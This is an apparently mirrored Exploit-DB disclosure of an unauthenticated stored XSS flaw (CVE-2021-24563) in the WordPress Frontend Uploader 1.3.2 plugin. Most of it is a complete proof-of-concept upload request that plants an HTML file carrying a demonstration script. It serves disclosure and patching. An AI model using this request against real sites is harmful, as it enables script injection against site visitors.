WordPress Plugin Frontend Uploader 1.3.2 – Stored Cross Site Scripting (XSS) (Unauthenticated)

  • 作者: Veshraj Ghimire
    日期: 2022-01-12
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50655/
  • # Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)
    # Date: 10/01/2022
    # Exploit Author: Veshraj Ghimire
    # Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/
    # Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/
    # Version: 1.3.2
    # Tested on: Windows 10 - Chrome, WordPress 5.8.2
    # CVE :CVE-2021-24563
    
    # References:
    
    https://www.youtube.com/watch?v=lfrLoHl4-Zs
    https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1
    
    # Description:
    
    The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly
    
    
    # Proof Of Concept:
    
    
    POST /wp-admin/admin-ajax.php HTTP/1.1
    
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    
    Accept-Language: en-GB,en;q=0.5
    
    Accept-Encoding: gzip, deflate
    
    Content-Type: multipart/form-data;
    boundary=---------------------------124662954015823207281179831654
    
    Content-Length: 1396
    
    Connection: close
    
    Upgrade-Insecure-Requests: 1
    
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="post_ID"
    
    
    1247
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="post_title"
    
    
    test
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="post_content"
    
    
    test
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="files[]"; filename="xss.html"
    
    Content-Type: text/html
    
    
    <script>alert(/XSS/)</script>
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="action"
    
    
    upload_ugc
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="form_layout"
    
    
    image
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="fu_nonce"
    
    
    021fb612f9
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="_wp_http_referer"
    
    
    /wordpress/frontend-uploader-form/
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="ff"
    
    
    92b6cbfa6120e13ff1654e28cef2a271
    
    -----------------------------124662954015823207281179831654
    
    Content-Disposition: form-data; name="form_post_id"
    
    
    1247
    
    -----------------------------124662954015823207281179831654--
    
    
    
    Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html